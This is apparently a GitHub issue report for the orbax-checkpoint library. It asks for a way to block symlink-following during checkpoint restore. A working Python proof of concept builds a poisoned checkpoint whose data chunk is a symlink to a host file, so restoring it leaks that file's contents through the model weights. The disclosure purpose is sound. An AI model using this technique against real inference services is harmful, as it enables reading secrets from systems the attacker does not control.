Is it possible to forbid following symlinks inside the checkpoint folder, so that restoring a checkpoint cannot read arbitrary files from the file system?
# The restore call in question; `ckpt_path` and `target` are not defined in this snippet.
orbax_checkpointer = ocp.Checkpointer(ocp.PyTreeCheckpointHandler())
restored = orbax_checkpointer.restore(ckpt_path, item=target)
This can be an issue when a user does not have full access to an infrastructure but only to some "inference engine" that lets them load pretrained weights: they can "attack" the system with poisoned weights and try to read files from the host through the loaded model weights.
Here is an orbax-checkpoint-only reproducer with detailed explanation:
from pathlib import Path
import shutil
import json
import numpy as np
import orbax.checkpoint as ocp
def make_poisoned_checkpoint(output_path: Path, file_to_read: Path, n: int) -> None:
    """Create a checkpoint whose data chunk for ``w`` is a symlink to a file.

    A regular checkpoint holding a single ``uint8`` array ``w`` of length
    ``n`` is saved first. Its stored chunk is then replaced by a symlink to
    ``file_to_read`` and its ``zarr.json`` is rewritten by hand.

    Args:
        output_path: Directory the checkpoint is written to.
        file_to_read: Target of the symlink that replaces the stored chunk.
        n: Length of the ``uint8`` array, i.e. the number of bytes declared
            in the rewritten metadata.

    Raises:
        AssertionError: If the saved checkpoint does not contain the
            expected ``w/c/0`` chunk or ``w/zarr.json`` file.
    """
    checkpointer = ocp.Checkpointer(
        ocp.PyTreeCheckpointHandler(use_ocdbt=False, use_zarr3=True)
    )
    checkpointer.save(output_path, {"w": np.zeros(n, np.uint8)})

    array_dir = output_path / "w"

    # Make a symlink in place of the stored weights.
    chunk_path = array_dir / "c" / "0"
    assert chunk_path.exists(), f"expected chunk file at {chunk_path}"
    chunk_path.unlink()
    chunk_path.symlink_to(file_to_read)

    # Replace the zarr metadata: a 1-D uint8 array of length n stored as a
    # single chunk with only the "bytes" codec (presumably so the symlinked
    # file's content is taken as the array data verbatim).
    metadata_path = array_dir / "zarr.json"
    assert metadata_path.exists(), f"expected metadata file at {metadata_path}"
    metadata_path.unlink()
    metadata = {
        "zarr_format": 3,
        "chunk_key_encoding": {"name": "default"},
        "node_type": "array",
        "fill_value": 0,
        "shape": [n],
        "data_type": "uint8",
        "chunk_grid": {
            "name": "regular",
            "configuration": {"chunk_shape": [n]},
        },
        "codecs": [{"name": "bytes"}],
    }
    with metadata_path.open("w") as f:
        json.dump(metadata, f)
if __name__ == "__main__":
    # Context: let's say we want to read a file from a remote machine where
    # we do not have direct FS access, but we do have access to an inference
    # engine, can load a checkpoint and can inspect the model's parameters.

    # Step 1:
    # On a host machine we prepare a poisoned checkpoint with a symlink to
    # the file we want to read on the remote machine.
    file_to_read = Path("/tmp/some_data")
    with file_to_read.open("w") as f:
        f.write("this-is-a-secret")

    chkpt_out_folder = Path("/tmp/poisoned_chkpt")
    if chkpt_out_folder.exists():
        shutil.rmtree(chkpt_out_folder)

    # Shortcut: we hard-code the exact number of bytes to read. Without it we
    # would presumably need to make two checkpoints, learning the exact value
    # from the first attempt to load a checkpoint on the remote machine.
    n = 22
    make_poisoned_checkpoint(chkpt_out_folder, file_to_read, n=n)

    # Step 2:
    # Now we are on the remote machine, but with limited access: we can load
    # pretrained weights into a model and inspect the model weights.
    # We omit the model itself for simplicity.

    # Write something else to the file on the remote machine.
    with file_to_read.open("w") as f:
        f.write("this-is-another-secret")

    # We "download" the poisoned checkpoint.
    ckpt_path = chkpt_out_folder

    # We load the checkpoint.
    checkpointer = ocp.Checkpointer(ocp.PyTreeCheckpointHandler())
    restored = checkpointer.restore(ckpt_path, item=None)

    # Now we can read the data from the file:
    leaked = np.asarray(restored["w"]).astype(np.uint8).tobytes()
    print(leaked.splitlines()[0])
    # b'this-is-another-secret'
Context: google/flax#5487 (comment); credit goes to the author of that issue.
Is it possible to forbid following symlinks inside the checkpoint folder, so that restoring a checkpoint cannot read arbitrary files from the file system?
This can be an issue when a user does not have full access to an infrastructure but only to some "inference engine" that lets them load pretrained weights: they can "attack" the system with poisoned weights and try to read files from the host through the loaded model weights.
Here is an orbax-checkpoint-only reproducer with detailed explanation:
Context: google/flax#5487 (comment); credit goes to the author of that issue.